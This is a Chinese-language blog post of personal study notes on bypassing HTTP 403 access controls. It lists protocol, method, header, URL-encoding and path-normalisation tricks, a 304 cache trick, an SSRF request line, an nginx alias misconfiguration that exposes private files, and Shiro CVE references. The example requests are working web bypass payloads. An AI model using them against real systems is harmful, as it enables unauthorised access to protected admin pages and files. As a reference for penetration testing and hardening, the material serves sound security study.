首页 > 其他分享 >学习笔记-绕过访问

学习笔记-绕过访问

时间:2022-11-02 15:47:45浏览次数:80  
标签:web 200 admin 笔记 访问 403 绕过 com

绕过访问


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


相关文章

相关案例

相关工具

相关资源

Tips

  • protocol based bypass

    http://web.com/admin    # ===> 403
    https://web.com/admin   # ===> 200
    
  • method based bypass

    OPTIONS
    GET
    HEAD
    POST
    PUT
    DELETE
    TRACE
    TRACK
    CONNECT
    PROPFIND
    PROPPATCH
    MKCOL
    COPY
    MOVE
    LOCK
    UNLOCK
    VERSION-CONTROL
    REPORT
    CHECKOUT
    CHECKIN
    UNCHECKOUT
    MKWORKSPACE
    UPDATE
    LABEL
    MERGE
    BASELINE-CONTROL
    MKACTIVITY
    ORDERPATCH
    ACL
    PATCH
    SEARCH
    ARBITRARY
    
  • HTTP Header based bypass

    GET /admin HTTP/1.1
    Host: web.com   # ===> 403
    
    GET /anything HTTP/1.1
    Host: web.com
    X-Original-URL: /admin  # ===> 200
    
    GET /anything HTTP/1.1
    Host: web.com
    Referer: https://web.com/admin  # ===> 200
    
    GET https://qq.com HTTP/1.1
    Host: web.com   # ===> SSRF
    
  • url character/parameter bypass

    /admin/panel            # ===> 403
    /admin/monitor          # ===> 200
    
    /admin/monitor/;panel   # ===> 302
    
    web.com/admin           # ===> 403
    
    web.com/ADMIN           # ===> 200
    web.com/admin/          # ===> 200
    web.com//admin/         # ===> 200
    web.com/admin;          # ===> 200
    web.com/admin/.         # ===> 200
    web.com/admin/../admin  # ===> 200
    web.com/admin../admin   # ===> 200
    web.com/../admin        # ===> 200
    web.com//admin//        # ===> 200
    web.com/./admin/./      # ===> 200
    web.com/./admin/..      # ===> 200
    web.com/;/admin         # ===> 200
    web.com/.;/admin        # ===> 200
    web.com//;//admin       # ===> 200
    web.com/admin.json      # ===> 200(ruby)
    
    web.com/%2f/admin/      # ===> 200
    web.com/%2e/admin       # ===> 200
    web.com/%252e/admin     # ===> 200
    web.com/%ef%bc%8fadmin  # ===> 200
    
    web.com/admin           # ===> 302
    web.com/test/admin      # ===> 200
    web.com/admin..;/       # ===> 200
    
  • 304 bypass

    GET /admin HTTP/1.1
    Host: target.com
    If-None-Match: W/"123-dASdsa2d2212e4d21"
    
    GET /admin HTTP/1.1
    Host: target.com
    
    If-None-Match: W/"123-dASdsa2d2212e4d21"
    
    If-None-Match: W/"null"
    If-None-Match: W/"123-dASdsa2d2212e4d21" a
    

nginx

相关文章

root /var/www/html/public;

location /test/ {
    alias /var/www/html/public/;
}

✔  /test/public.html
❌  /test../private/secret.html
root /var/www/html/public;

location /test {
    alias /var/www/html/public/;
}

✔  /test/public.html
✔  /test../private/secret.html

Tomcat

相关文章


shiro

SHIRO-682 & CVE-2020-1957 | Shiro 权限绕过漏洞

SHIRO-782 & CVE-2020-11989

CVE-2020-17523

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

标签:web,200,admin,笔记,访问,403,绕过,com
From: https://www.cnblogs.com/haidragon/p/16851171.html

相关文章

  • 学习笔记-HTTP_request_smuggling
    HTTP_request_smuggling免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.相关文章HTTPDesyncAttack......
  • 学习笔记-OOB
    OOB免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.相关文章带外通道技术(OOB)总结OOB(outofband)分......
  • 学习笔记-JWT 安全
    JWT安全免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.关于JWT认证的基本知识点可见笔记认证&......
  • delphi TscSplitView控件学习笔记
    一.先说效果吧,放置的位置不一样,显示出来的效果也不一样 然后效果是这样的:注意位置标记1按钮的位置.当DisplayMode:=scsvmOverlay时,会遮挡TscSplitView......
  • Vue3学习笔记(四)——组件、生命周期
    一、组件如果我们将一个页面中所有的处理逻辑全部放在一起,处理起来就会变得非常复杂,而且不利于后续的管理以及扩展,但如果,我们将一个页面拆分成一个个小的功能块,每个功能......
  • 【笔记14】Javascript - 继承
    【笔记14】Javascript-继承继承的概念不陌生,在原型、原型链那里,就知道一个对象能继承到原型很多属性和方法。各种继承的方法有优势有不足,看下继承发展史:继承传统形式:原型......
  • 十月阅读笔记1
    6、交流知道你想要说什么,当我们面临会议,重要通话,或者只是撰写技术文档,问下自己你要表达的中心想法是什么,围绕这一点进行展开。了解你的听众,选择风格,传达一个消息,可以是正......
  • 十月阅读笔记2
    8、正交性正交性是一个从几何学中借鉴而来的术语,如果两条直线相交成直角,他们就是正交的。这在向量中的解释是沿着一条直线移动,你投影到另一条直线上的位置不变。在计算机......
  • 知网文献检索笔记
    知网文献检索笔记前言大二上了一门文献检索的课。当时感兴趣做了一下笔记。现在参照一下。以后写论文的时候可以借鉴一下。不过当时学得有些表面了。当时我对于论文的感觉就......
  • 《高大上的PPT设计秘笈》笔记
    PPT排版经验前言最近需要上课讲PPT,我回顾一下以前写的PPT排版笔记。参考教程:《​​高大上的PPT设计秘笈人气体验版​​》有些截图有些模糊,大家可以看视频。主要内容文章目......